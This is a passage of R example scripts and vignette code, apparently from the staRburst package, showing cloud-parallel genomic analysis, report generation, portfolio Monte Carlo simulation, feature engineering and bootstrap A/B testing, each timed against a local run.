      exp_0 <- (1 - p)^2
      exp_1 <- 2 * p * (1 - p)
      exp_2 <- p^2

      # Chi-square test (simplified)
      obs <- c(sum(geno == 0), sum(geno == 1), sum(geno == 2))
      exp <- c(exp_0, exp_1, exp_2) * length(geno)

      # Avoid division by zero
      exp[exp < 1] <- 1

      chisq <- sum((obs - exp)^2 / exp)
      pchisq(chisq, df = 1, lower.tail = FALSE)
    })

    # Analysis 3: Linkage Disequilibrium between nearby variants
    # Sample 500 variant pairs
    ld_results <- lapply(1:500, function(i) {
      v1_idx <- sample(n_variants, 1)
      v2_idx <- sample(max(1, v1_idx - 100):min(n_variants, v1_idx + 100), 1)

      v1 <- genotypes[v1_idx, ]
      v2 <- genotypes[v2_idx, ]

      # Calculate D' (measure of LD)
      cor(v1, v2)^2  # r^2 as LD measure
    })

    # Analysis 4: Gene-based association tests
    # Group variants by genes (simplified: chunks of 2-3 variants per gene)
    n_test_genes <- min(5000, n_genes)
    gene_pvalues <- sapply(1:n_test_genes, function(g) {
      # Get variants for this gene
      gene_start <- ((g - 1) * 2) + 1
      gene_end <- min(gene_start + 2, n_variants)

      if (gene_end > n_variants) return(NA)

      gene_genotypes <- genotypes[gene_start:gene_end, , drop = FALSE]

      # Aggregate genotypes (sum across variants in gene)
      gene_score <- sum(gene_genotypes)

      # Association with phenotypes (simplified)
      # Create gene-phenotype correlation across multiple "samples"
      # In reality: this would be across many samples, not within one
      # Simplified: compare gene score to phenotype variance
      gene_effect <- gene_score * mean(phenotypes) + rnorm(1, 0, 0.1)

      # Simple p-value based on gene score magnitude
      pval <- 2 * pnorm(-abs(gene_effect / sd(phenotypes)))
      pval
    })

    # Analysis 5: Population stratification (PCA on genotypes)
    # Sample 1000 variants for PCA
    pca_variants <- genotypes[sample(n_variants, min(1000, n_variants)), , drop = FALSE]
    # In real analysis: run PCA, we'll just compute variance
    variant_var <- apply(pca_variants, 1, var)

    # Return comprehensive results
    list(
      sample_id = sample_id,
      n_variants = n_variants,
      mean_allele_freq = mean(allele_freq),
      hwe_violations = sum(hwe_pvalues < 0.05, na.rm = TRUE),
      mean_ld = mean(unlist(ld_results), na.rm = TRUE),
      significant_genes = sum(gene_pvalues < 0.001, na.rm = TRUE),
      total_genes_tested = sum(!is.na(gene_pvalues)),
      variant_variance = mean(variant_var)
    )
  })

  results
}

# Test single sample timing
cat("Testing single sample analysis...\n")
single_start <- Sys.time()
test_result <- analyze_sample_batch(1:1)
single_time <- as.numeric(difftime(Sys.time(), single_start, units = "secs"))
cat(sprintf("Single sample: %.1f seconds\n\n", single_time))

# Estimate total sequential time
total_sequential <- single_time * n_samples
cat(sprintf("Estimated sequential time: %.1f hours\n\n", total_sequential / 3600))

# Create sample batches
sample_batches <- split(
  1:n_samples,
  ceiling(seq_along(1:n_samples) / samples_per_worker)
)

n_workers <- length(sample_batches)

cat(sprintf("CLOUD EXECUTION: %d workers processing %d batches\n",
            n_workers, length(sample_batches)))
cat(sprintf("Each worker analyzes %d samples (~%.1f minutes)\n\n",
            samples_per_worker, (samples_per_worker * single_time) / 60))

# LOCAL benchmark: Process small subset
local_subset <- 5
cat(sprintf("LOCAL: Processing %d samples for timing...\n", local_subset))
local_start <- Sys.time()
local_results <- analyze_sample_batch(1:local_subset)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
local_estimated <- (local_time / local_subset) * n_samples

cat(sprintf("✓ %d samples in %.1f seconds\n", local_subset, local_time))
cat(sprintf("  Estimated for %d: %.1f hours\n\n", n_samples, local_estimated / 3600))

# CLOUD execution
cat("Starting cloud analysis...\n")
cloud_start <- Sys.time()
cloud_results <- starburst_map(
  sample_batches,
  analyze_sample_batch,
  workers = n_workers
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ Completed in %.1f minutes (%.1f hours)\n\n",
            cloud_time / 60, cloud_time / 3600))

# Calculate speedup
speedup <- local_estimated / cloud_time
time_saved <- local_estimated - cloud_time

cat("╔══════════════════════════════════════════════════╗\n")
cat("║     GENOMIC ANALYSIS RESULTS                     ║\n")
cat("╚══════════════════════════════════════════════════╝\n\n")

cat(sprintf("Samples analyzed: %s\n", format(n_samples, big.mark = ",")))
cat(sprintf("Total variants: %s\n\n",
            format(n_samples * n_variants, big.mark = ",")))

cat("┌────────────────────────────────────────────────┐\n")
cat("│ PERFORMANCE                                    │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Local (estimated): %.1f hours             │\n", local_estimated / 3600))
cat(sprintf("│ Cloud (%d workers): %.1f hours            │\n", n_workers, cloud_time / 3600))
cat(sprintf("│ Speedup: %.0fx                             │\n", speedup))
cat(sprintf("│ Time saved: %.1f hours                    │\n", time_saved / 3600))
cat("└────────────────────────────────────────────────┘\n\n")

# Scientific results summary
all_results <- unlist(cloud_results, recursive = FALSE)
cat("┌────────────────────────────────────────────────┐\n")
cat("│ SCIENTIFIC RESULTS                             │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Mean allele frequency: %.3f                │\n",
            mean(sapply(all_results, function(r) r$mean_allele_freq))))
cat(sprintf("│ HWE violations: %s                       │\n",
            format(sum(sapply(all_results, function(r) r$hwe_violations)), big.mark = ",")))
cat(sprintf("│ Mean LD (r²): %.3f                         │\n",
            mean(sapply(all_results, function(r) r$mean_ld))))
cat(sprintf("│ Significant genes: %s                    │\n",
            format(sum(sapply(all_results, function(r) r$significant_genes)), big.mark = ",")))
cat("└────────────────────────────────────────────────┘\n\n")

cat("✓ Genomic analysis complete!\n\n")

if (speedup >= 80) {
  cat(sprintf("🎉 REAL SCIENCE: %.0fx speedup demonstrates true cloud power!\n", speedup))
  cat(sprintf("Saved %.1f hours of computation time.\n", time_saved / 3600))
} else {
  cat(sprintf("Current speedup: %.0fx\n", speedup))
  cat("Note: Increase samples or variants for even larger scale.\n")
}

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)
# library(rmarkdown)

## ----template, eval=FALSE-----------------------------------------------------
# # Create report template
# report_template <- '
# ---
# title: "Monthly Analytics Report"
# output: html_document
# params:
#   customer_id: ""
#   customer_name: ""
#   month: ""
#   data: NULL
# ---
# 
# `​``{r template-setup, include=FALSE}
# knitr::opts_chunk$set(echo = FALSE, warning = FALSE, message = FALSE)
# `​``
# 
# # Monthly Report for `r params$customer_name`
# 
# **Customer ID:** `r params$customer_id`
# **Period:** `r params$month`
# **Report Generated:** `r format(Sys.time(), "%Y-%m-%d %H:%M")`
# 
# ---
# 
# ## Executive Summary
# 
# This report summarizes activity for `r params$customer_name` during `r params$month`.
# 
# \`\`\`{r summary}
# data <- params$data
# cat(sprintf("Total transactions: %d\\n", nrow(data)))
# cat(sprintf("Total revenue: $%.2f\\n", sum(data$revenue)))
# cat(sprintf("Average order value: $%.2f\\n", mean(data$revenue)))
# cat(sprintf("Active days: %d\\n", length(unique(data$date))))
# \`\`\`
# 
# ## Revenue Trend
# 
# \`\`\`{r revenue-plot, fig.width=8, fig.height=4}
# daily_revenue <- aggregate(revenue ~ date, data, sum)
# plot(daily_revenue$date, daily_revenue$revenue,
#      type = "l", lwd = 2, col = "steelblue",
#      main = "Daily Revenue Trend",
#      xlab = "Date", ylab = "Revenue ($)")
# grid()
# \`\`\`
# 
# ## Top Products
# 
# \`\`\`{r top-products}
# top_products <- head(
#   aggregate(revenue ~ product, data, sum),
#   10
# )
# top_products <- top_products[order(-top_products$revenue), ]
# knitr::kable(top_products, format.args = list(big.mark = ","))
# \`\`\`
# 
# ## Summary Statistics
# 
# \`\`\`{r stats}
# stats <- data.frame(
#   Metric = c("Total Orders", "Avg Order Value", "Max Order",
#              "Min Order", "Std Dev"),
#   Value = c(
#     nrow(data),
#     round(mean(data$revenue), 2),
#     round(max(data$revenue), 2),
#     round(min(data$revenue), 2),
#     round(sd(data$revenue), 2)
#   )
# )
# knitr::kable(stats, format.args = list(big.mark = ","))
# \`\`\`
# 
# ---
# 
# *This report was automatically generated using staRburst parallel processing.*
# '
# 
# # Save template to file
# writeLines(report_template, "report_template.Rmd")

## ----data, eval=FALSE---------------------------------------------------------
# # Function to generate data for one customer
# generate_customer_data <- function(customer_id) {
#   set.seed(customer_id)
# 
#   n_transactions <- sample(100:500, 1)
#   dates <- sort(sample(seq.Date(
#     from = as.Date("2026-01-01"),
#     to = as.Date("2026-01-31"),
#     by = "day"
#   ), n_transactions, replace = TRUE))
# 
#   products <- c("Product A", "Product B", "Product C",
#                 "Product D", "Product E")
# 
#   data.frame(
#     customer_id = customer_id,
#     date = dates,
#     product = sample(products, n_transactions, replace = TRUE),
#     revenue = round(rnorm(n_transactions, mean = 150, sd = 50), 2),
#     stringsAsFactors = FALSE
#   )
# }
# 
# # Generate customer list
# n_customers <- 50
# customers <- data.frame(
#   customer_id = sprintf("CUST%03d", 1:n_customers),
#   customer_name = paste("Company", LETTERS[1:n_customers %% 26 + 1],
#                        (1:n_customers %/% 26) + 1),
#   stringsAsFactors = FALSE
# )
# 
# head(customers)

## ----render-fn, eval=FALSE----------------------------------------------------
# generate_report <- function(customer_info) {
#   customer_id <- customer_info$customer_id
#   customer_name <- customer_info$customer_name
# 
#   # Generate data for this customer
#   data <- generate_customer_data(as.numeric(gsub("CUST", "", customer_id)))
# 
#   # Output file path
#   output_file <- sprintf("report_%s.html", customer_id)
# 
#   tryCatch({
#     # Render report
#     rmarkdown::render(
#       input = "report_template.Rmd",
#       output_file = output_file,
#       params = list(
#         customer_id = customer_id,
#         customer_name = customer_name,
#         month = "January 2026",
#         data = data
#       ),
#       quiet = TRUE
#     )
# 
#     list(
#       customer_id = customer_id,
#       success = TRUE,
#       output_file = output_file,
#       file_size = file.size(output_file),
#       render_time = Sys.time()
#     )
#   }, error = function(e) {
#     list(
#       customer_id = customer_id,
#       success = FALSE,
#       error = as.character(e),
#       render_time = Sys.time()
#     )
#   })
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Test with 5 reports
# test_customers <- head(customers, 5)
# 
# cat(sprintf("Rendering %d reports locally...\n", nrow(test_customers)))
# local_start <- Sys.time()
# 
# local_results <- lapply(
#   split(test_customers, 1:nrow(test_customers)),
#   generate_report
# )
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("✓ Completed in %.1f seconds\n", local_time))
# cat(sprintf("  Average: %.1f seconds per report\n", local_time / 5))
# cat(sprintf("  Estimated time for %d reports: %.1f minutes\n\n",
#             n_customers, (local_time / 5 * n_customers) / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# cat(sprintf("Rendering %d reports on AWS...\n", n_customers))
# 
# # Convert data frame rows to list for starburst_map
# customer_list <- split(customers, 1:nrow(customers))
# 
# results <- starburst_map(
#   customer_list,
#   generate_report,
#   workers = 25,
#   cpu = 2,
#   memory = "4GB"
# )

## ----results, eval=FALSE------------------------------------------------------
# # Check success rate
# success_count <- sum(sapply(results, function(x) x$success))
# failure_count <- sum(!sapply(results, function(x) x$success))
# 
# cat("\n=== Report Generation Summary ===\n\n")
# cat(sprintf("Total reports: %d\n", length(results)))
# cat(sprintf("Successfully generated: %d (%.1f%%)\n",
#             success_count, (success_count / length(results)) * 100))
# cat(sprintf("Failed: %d\n\n", failure_count))
# 
# # File size summary
# successful_results <- results[sapply(results, function(x) x$success)]
# file_sizes <- sapply(successful_results, function(x) x$file_size)
# 
# cat("File size statistics:\n")
# cat(sprintf("  Total size: %.2f MB\n", sum(file_sizes) / 1024^2))
# cat(sprintf("  Average size: %.1f KB\n", mean(file_sizes) / 1024))
# cat(sprintf("  Range: %.1f - %.1f KB\n\n",
#             min(file_sizes) / 1024, max(file_sizes) / 1024))
# 
# # Show sample of generated reports
# cat("Generated reports:\n")
# report_files <- sapply(successful_results[1:10], function(x) x$output_file)
# print(report_files)

## ----distribution, eval=FALSE-------------------------------------------------
# generate_and_distribute <- function(customer_info) {
#   # Generate report
#   result <- generate_report(customer_info)
# 
#   if (result$success) {
#     # Upload to S3 (example)
#     tryCatch({
#       # paws::s3()$put_object(
#       #   Bucket = "my-reports-bucket",
#       #   Key = sprintf("reports/2026-01/%s", result$output_file),
#       #   Body = readBin(result$output_file, "raw",
#       #                  file.size(result$output_file))
#       # )
# 
#       result$uploaded <- TRUE
#       result$s3_url <- sprintf("s3://my-reports-bucket/reports/2026-01/%s",
#                               result$output_file)
#     }, error = function(e) {
#       result$uploaded <- FALSE
#       result$upload_error <- as.character(e)
#     })
#   }
# 
#   result
# }

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/reports.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/reports.R", package = "starburst"))

#!/usr/bin/env Rscript
#
# Monte Carlo Portfolio Simulation Example
#
# This script demonstrates parallel portfolio simulations using staRburst.
# It runs 10,000 independent portfolio trajectories to estimate risk metrics.
#
# Usage:
#   Rscript monte-carlo.R
#   # or from R:
#   source(system.file("examples/monte-carlo.R", package = "starburst"))

library(starburst)

cat("=== Monte Carlo Portfolio Simulation ===\n\n")

# Simulation function
simulate_portfolio <- function(seed) {
  set.seed(seed)

  # Portfolio parameters
  n_days <- 252
  initial_value <- 1000000  # $1M portfolio

  # Asset allocation (60/40 stocks/bonds)
  stock_weight <- 0.6
  bond_weight <- 0.4

  # Expected returns (annualized)
  stock_return <- 0.10 / 252  # 10% annual
  bond_return <- 0.04 / 252   # 4% annual

  # Volatility (annualized)
  stock_vol <- 0.20 / sqrt(252)  # 20% annual
  bond_vol <- 0.05 / sqrt(252)   # 5% annual

  # Correlation
  correlation <- 0.3

  # Generate correlated returns
  stock_returns <- rnorm(n_days, mean = stock_return, sd = stock_vol)
  bond_noise <- rnorm(n_days)
  bond_returns <- rnorm(n_days, mean = bond_return, sd = bond_vol)
  bond_returns <- correlation * stock_returns +
                  sqrt(1 - correlation^2) * bond_returns

  # Portfolio returns
  portfolio_returns <- stock_weight * stock_returns +
                      bond_weight * bond_returns

  # Cumulative value
  portfolio_values <- initial_value * cumprod(1 + portfolio_returns)

  # Calculate metrics
  final_value <- portfolio_values[n_days]
  max_drawdown <- max((cummax(portfolio_values) - portfolio_values) /
                      cummax(portfolio_values))
  sharpe_ratio <- mean(portfolio_returns) / sd(portfolio_returns) * sqrt(252)

  list(
    final_value = final_value,
    return_pct = (final_value - initial_value) / initial_value * 100,
    max_drawdown = max_drawdown,
    sharpe_ratio = sharpe_ratio,
    min_value = min(portfolio_values),
    max_value = max(portfolio_values)
  )
}

# Local benchmark (100 simulations)
cat("Running local benchmark (100 simulations)...\n")
set.seed(123)
local_start <- Sys.time()
local_results <- lapply(1:100, simulate_portfolio)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
cat(sprintf("  Estimated time for 10,000: %.1f minutes\n\n", local_time * 100 / 60))

# Cloud execution
n_sims <- 10000
n_workers <- 50

cat(sprintf("Running %d simulations on %d workers...\n", n_sims, n_workers))

cloud_start <- Sys.time()
results <- starburst_map(
  1:n_sims,
  simulate_portfolio,
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))

cat(sprintf("\n✓ Completed in %.2f minutes\n\n", cloud_time))

# Extract metrics
final_values <- sapply(results, function(x) x$final_value)
returns <- sapply(results, function(x) x$return_pct)
sharpe_ratios <- sapply(results, function(x) x$sharpe_ratio)
max_drawdowns <- sapply(results, function(x) x$max_drawdown)

# Print results
cat("\n=== Results ===\n\n")
cat(sprintf("Mean final value: $%.0f\n", mean(final_values)))
cat(sprintf("Median final value: $%.0f\n", median(final_values)))
cat(sprintf("\nMean return: %.2f%%\n", mean(returns)))
cat(sprintf("Std dev of returns: %.2f%%\n", sd(returns)))
cat(sprintf("\nValue at Risk (5%%): $%.0f\n", quantile(final_values, 0.05)))
cat(sprintf("Expected Shortfall (5%%): $%.0f\n",
            mean(final_values[final_values <= quantile(final_values, 0.05)])))
cat(sprintf("\nMean Sharpe Ratio: %.2f\n", mean(sharpe_ratios)))
cat(sprintf("Mean Max Drawdown: %.2f%%\n", mean(max_drawdowns) * 100))
cat(sprintf("\nProbability of loss: %.2f%%\n", mean(returns < 0) * 100))

# Performance comparison
cat("\n=== Performance Comparison ===\n\n")
speedup <- (local_time * 100 / 60) / cloud_time
cat(sprintf("Local (estimated): %.1f minutes\n", local_time * 100 / 60))
cat(sprintf("Cloud (%d workers): %.2f minutes\n", n_workers, cloud_time))
cat(sprintf("Speedup: %.1fx\n", speedup))

# Save results (optional)
if (interactive()) {
  save_results <- readline("Save results to file? (y/n): ")
  if (tolower(save_results) == "y") {
    saveRDS(results, "monte_carlo_results.rds")
    cat("Results saved to monte_carlo_results.rds\n")
  }
}

cat("\n✓ Done!\n")

#!/usr/bin/env Rscript
#
# Parallel Feature Engineering Example
#
# This script demonstrates parallel feature computation across customer segments.
# It processes 100,000 transactions to generate engineered features for ML.
#
# Usage:
#   Rscript feature-engineering.R
#   # or from R:
#   source(system.file("examples/feature-engineering.R", package = "starburst"))

library(starburst)

cat("=== Parallel Feature Engineering ===\n\n")

# Generate synthetic transaction data
set.seed(123)

n_customers <- 5000
n_transactions <- 100000

cat(sprintf("Generating %s transactions for %s customers...\n",
            format(n_transactions, big.mark = ","),
            format(n_customers, big.mark = ",")))

transactions <- data.frame(
  customer_id = sample(1:n_customers, n_transactions, replace = TRUE),
  transaction_date = as.Date("2023-01-01") + sample(0:364, n_transactions, replace = TRUE),
  amount = exp(rnorm(n_transactions, log(50), 0.8)),
  category = sample(c("groceries", "electronics", "clothing", "restaurants", "other"),
                   n_transactions, replace = TRUE, prob = c(0.4, 0.1, 0.2, 0.2, 0.1)),
  payment_method = sample(c("credit", "debit", "cash"), n_transactions, replace = TRUE),
  is_online = sample(c(TRUE, FALSE), n_transactions, replace = TRUE, prob = c(0.3, 0.7)),
  stringsAsFactors = FALSE
)

transactions <- transactions[order(transactions$customer_id, transactions$transaction_date), ]

cat(sprintf("✓ Generated dataset\n"))
cat(sprintf("  Date range: %s to %s\n\n",
            min(transactions$transaction_date),
            max(transactions$transaction_date)))

# Feature engineering function
engineer_features <- function(customer_ids, transactions_data) {
  customer_data <- transactions_data[transactions_data$customer_id %in% customer_ids, ]

  if (nrow(customer_data) == 0) {
    return(NULL)
  }

  customer_data <- customer_data[order(customer_data$customer_id,
                                      customer_data$transaction_date), ]

  features_list <- lapply(customer_ids, function(cid) {
    cust_txn <- customer_data[customer_data$customer_id == cid, ]

    if (nrow(cust_txn) == 0) {
      return(NULL)
    }

    # Basic statistics
    total_transactions <- nrow(cust_txn)
    total_spend <- sum(cust_txn$amount)
    avg_transaction <- mean(cust_txn$amount)

    # Time-based features
    first_purchase <- min(cust_txn$transaction_date)
    last_purchase <- max(cust_txn$transaction_date)
    days_active <- as.numeric(difftime(last_purchase, first_purchase, units = "days"))
    purchase_frequency <- if (days_active > 0) total_transactions / days_active else 0

    # Rolling statistics (last 30 days)
    recent_cutoff <- last_purchase - 30
    recent_txn <- cust_txn[cust_txn$transaction_date > recent_cutoff, ]
    recent_spend <- if (nrow(recent_txn) > 0) sum(recent_txn$amount) else 0
    recent_count <- nrow(recent_txn)

    # Category preferences
    category_counts <- table(cust_txn$category)
    favorite_category <- names(category_counts)[which.max(category_counts)]
    category_diversity <- length(unique(cust_txn$category))

    # Payment behavior
    online_pct <- mean(cust_txn$is_online) * 100
    credit_pct <- mean(cust_txn$payment_method == "credit") * 100

    # Volatility metrics
    amount_sd <- sd(cust_txn$amount)
    amount_cv <- amount_sd / avg_transaction

    # Time patterns
    weekday <- as.POSIXlt(cust_txn$transaction_date)$wday
    weekend_pct <- mean(weekday %in% c(0, 6)) * 100

    # RFM features
    recency <- as.numeric(difftime(as.Date("2024-01-01"), last_purchase, units = "days"))

    data.frame(
      customer_id = cid,
      total_transactions = total_transactions,
      total_spend = total_spend,
      avg_transaction = avg_transaction,
      days_active = days_active,
      purchase_frequency = purchase_frequency,
      recent_spend_30d = recent_spend,
      recent_count_30d = recent_count,
      favorite_category = favorite_category,
      category_diversity = category_diversity,
      online_pct = online_pct,
      credit_pct = credit_pct,
      amount_sd = amount_sd,
      amount_cv = amount_cv,
      weekend_pct = weekend_pct,
      recency_days = recency,
      stringsAsFactors = FALSE
    )
  })

  do.call(rbind, features_list[!sapply(features_list, is.null)])
}

# Local benchmark (500 customers)
cat("Running local benchmark (500 customers)...\n")
set.seed(456)
sample_customers <- sample(unique(transactions$customer_id), 500)

local_start <- Sys.time()
local_features <- engineer_features(sample_customers, transactions)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
cat(sprintf("  Generated %d features per customer\n", ncol(local_features) - 1))
cat(sprintf("  Estimated time for all %s customers: %.1f seconds\n\n",
            format(n_customers, big.mark = ","),
            local_time * (n_customers / 500)))

# Cloud execution
all_customers <- unique(transactions$customer_id)
n_workers <- 20

cat(sprintf("Processing features for %s customers on %d workers...\n",
            format(length(all_customers), big.mark = ","),
            n_workers))

# Create chunks
chunk_size <- ceiling(length(all_customers) / n_workers)
customer_chunks <- split(all_customers,
                        ceiling(seq_along(all_customers) / chunk_size))

cloud_start <- Sys.time()

results <- starburst_map(
  customer_chunks,
  engineer_features,
  transactions_data = transactions,
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)

cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ Completed in %.1f seconds\n\n", cloud_time))

# Combine results
features <- do.call(rbind, results)

# Print results
cat("=== Feature Engineering Results ===\n\n")
cat(sprintf("Total customers processed: %s\n",
            format(nrow(features), big.mark = ",")))
cat(sprintf("Features per customer: %d\n\n", ncol(features) - 1))

# Summary statistics
cat("=== Feature Summary Statistics ===\n\n")
cat(sprintf("Average transactions per customer: %.1f\n",
            mean(features$total_transactions)))
cat(sprintf("Average total spend: $%.2f\n",
            mean(features$total_spend)))
cat(sprintf("Average transaction value: $%.2f\n\n",
            mean(features$avg_transaction)))

cat(sprintf("Most common category: %s\n",
            names(sort(table(features$favorite_category), decreasing = TRUE)[1])))
cat(sprintf("Average category diversity: %.1f categories\n\n",
            mean(features$category_diversity)))

cat(sprintf("Average online purchase rate: %.1f%%\n",
            mean(features$online_pct)))
cat(sprintf("Average credit card usage: %.1f%%\n\n",
            mean(features$credit_pct)))

cat(sprintf("Mean purchase frequency: %.3f transactions/day\n",
            mean(features$purchase_frequency, na.rm = TRUE)))
cat(sprintf("Mean recency: %.0f days since last purchase\n\n",
            mean(features$recency_days)))

# High-value segment
high_value <- features[features$total_spend > quantile(features$total_spend, 0.9), ]
cat("=== Top 10% Customers (by spend) ===\n")
cat(sprintf("Count: %d customers\n", nrow(high_value)))
cat(sprintf("Average total spend: $%.2f\n", mean(high_value$total_spend)))
cat(sprintf("Average transactions: %.1f\n", mean(high_value$total_transactions)))
cat(sprintf("Average online rate: %.1f%%\n\n", mean(high_value$online_pct)))

# Performance comparison
cat("=== Performance Comparison ===\n\n")
estimated_local <- local_time * (n_customers / 500)
speedup <- estimated_local / cloud_time
cat(sprintf("Local (estimated): %.1f seconds\n", estimated_local))
cat(sprintf("Cloud (%d workers): %.1f seconds\n", n_workers, cloud_time))
cat(sprintf("Speedup: %.1fx\n", speedup))

cat("\n✓ Done!\n")

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)
# library(ggplot2)

## ----simulation, eval=FALSE---------------------------------------------------
# simulate_portfolio <- function(seed) {
#   set.seed(seed)
# 
#   # Portfolio parameters
#   n_days <- 252
#   initial_value <- 1000000  # $1M portfolio
# 
#   # Asset allocation (60/40 stocks/bonds)
#   stock_weight <- 0.6
#   bond_weight <- 0.4
# 
#   # Expected returns (annualized)
#   stock_return <- 0.10 / 252  # 10% annual
#   bond_return <- 0.04 / 252   # 4% annual
# 
#   # Volatility (annualized)
#   stock_vol <- 0.20 / sqrt(252)  # 20% annual
#   bond_vol <- 0.05 / sqrt(252)   # 5% annual
# 
#   # Correlation
#   correlation <- 0.3
# 
#   # Generate correlated returns
#   stock_returns <- rnorm(n_days, mean = stock_return, sd = stock_vol)
#   bond_noise <- rnorm(n_days)
#   bond_returns <- rnorm(n_days, mean = bond_return, sd = bond_vol)
#   bond_returns <- correlation * stock_returns +
#                   sqrt(1 - correlation^2) * bond_returns
# 
#   # Portfolio returns
#   portfolio_returns <- stock_weight * stock_returns +
#                       bond_weight * bond_returns
# 
#   # Cumulative value
#   portfolio_values <- initial_value * cumprod(1 + portfolio_returns)
# 
#   # Calculate metrics
#   final_value <- portfolio_values[n_days]
#   max_drawdown <- max((cummax(portfolio_values) - portfolio_values) /
#                       cummax(portfolio_values))
#   sharpe_ratio <- mean(portfolio_returns) / sd(portfolio_returns) * sqrt(252)
# 
#   list(
#     final_value = final_value,
#     return_pct = (final_value - initial_value) / initial_value * 100,
#     max_drawdown = max_drawdown,
#     sharpe_ratio = sharpe_ratio,
#     min_value = min(portfolio_values),
#     max_value = max(portfolio_values)
#   )
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Test with 100 simulations
# set.seed(123)
# local_start <- Sys.time()
# local_results <- lapply(1:100, simulate_portfolio)
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("100 simulations completed in %.1f seconds\n", local_time))
# cat(sprintf("Estimated time for 10,000: %.1f minutes\n",
#             local_time * 100 / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# # Run 10,000 simulations on 50 workers
# results <- starburst_map(
#   1:10000,
#   simulate_portfolio,
#   workers = 50,
#   cpu = 2,
#   memory = "4GB"
# )

## ----analysis, eval=FALSE-----------------------------------------------------
# # Extract metrics
# final_values <- sapply(results, function(x) x$final_value)
# returns <- sapply(results, function(x) x$return_pct)
# sharpe_ratios <- sapply(results, function(x) x$sharpe_ratio)
# max_drawdowns <- sapply(results, function(x) x$max_drawdown)
# 
# # Summary statistics
# cat("\n=== Portfolio Simulation Results (10,000 scenarios) ===\n")
# cat(sprintf("Mean final value: $%.0f\n", mean(final_values)))
# cat(sprintf("Median final value: $%.0f\n", median(final_values)))
# cat(sprintf("\nMean return: %.2f%%\n", mean(returns)))
# cat(sprintf("Std dev of returns: %.2f%%\n", sd(returns)))
# cat(sprintf("\nValue at Risk (5%%): $%.0f\n",
#             quantile(final_values, 0.05)))
# cat(sprintf("Expected Shortfall (5%%): $%.0f\n",
#             mean(final_values[final_values <= quantile(final_values, 0.05)])))
# cat(sprintf("\nMean Sharpe Ratio: %.2f\n", mean(sharpe_ratios)))
# cat(sprintf("Mean Max Drawdown: %.2f%%\n", mean(max_drawdowns) * 100))
# cat(sprintf("\nProbability of loss: %.2f%%\n",
#             mean(returns < 0) * 100))
# 
# # Distribution plot
# hist(final_values / 1000,
#      breaks = 50,
#      main = "Distribution of Portfolio Final Values",
#      xlab = "Final Value ($1000s)",
#      col = "lightblue",
#      border = "white")
# abline(v = 1000, col = "red", lwd = 2, lty = 2)
# abline(v = quantile(final_values / 1000, 0.05), col = "orange", lwd = 2, lty = 2)
# legend("topright",
#        c("Initial Value", "VaR (5%)"),
#        col = c("red", "orange"),
#        lwd = 2, lty = 2)

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/monte-carlo.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/monte-carlo.R", package = "starburst"))

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(42)
# 
# # Variant A (control)
# n_a <- 10000
# conversions_a <- 850
# variant_a <- c(rep(1, conversions_a), rep(0, n_a - conversions_a))
# 
# # Variant B (treatment)
# n_b <- 10000
# conversions_b <- 920
# variant_b <- c(rep(1, conversions_b), rep(0, n_b - conversions_b))
# 
# # Observed difference
# observed_diff <- mean(variant_b) - mean(variant_a)
# cat(sprintf("Observed conversion rates:\n"))
# cat(sprintf("  Variant A: %.2f%%\n", mean(variant_a) * 100))
# cat(sprintf("  Variant B: %.2f%%\n", mean(variant_b) * 100))
# cat(sprintf("  Difference: %.2f%% (%.1f%% relative lift)\n",
#             observed_diff * 100,
#             (observed_diff / mean(variant_a)) * 100))

## ----bootstrap-fn, eval=FALSE-------------------------------------------------
# bootstrap_iteration <- function(iter, data_a, data_b) {
#   # Resample with replacement
#   n_a <- length(data_a)
#   n_b <- length(data_b)
# 
#   sample_a <- sample(data_a, n_a, replace = TRUE)
#   sample_b <- sample(data_b, n_b, replace = TRUE)
# 
#   # Calculate metrics
#   rate_a <- mean(sample_a)
#   rate_b <- mean(sample_b)
#   diff <- rate_b - rate_a
#   relative_lift <- diff / rate_a
# 
#   list(
#     iteration = iter,
#     rate_a = rate_a,
#     rate_b = rate_b,
#     diff = diff,
#     relative_lift = relative_lift,
#     b_wins = diff > 0
#   )
# }

## ----local, eval=FALSE--------------------------------------------------------
# n_bootstrap_local <- 1000
# 
# cat(sprintf("Running %d bootstrap iterations locally...\n", n_bootstrap_local))
# local_start <- Sys.time()
# 
# local_results <- lapply(
#   1:n_bootstrap_local,
#   bootstrap_iteration,
#   data_a = variant_a,
#   data_b = variant_b
# )
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# cat(sprintf("✓ Completed in %.2f seconds\n\n", local_time))

## ----cloud, eval=FALSE--------------------------------------------------------
# n_bootstrap <- 10000
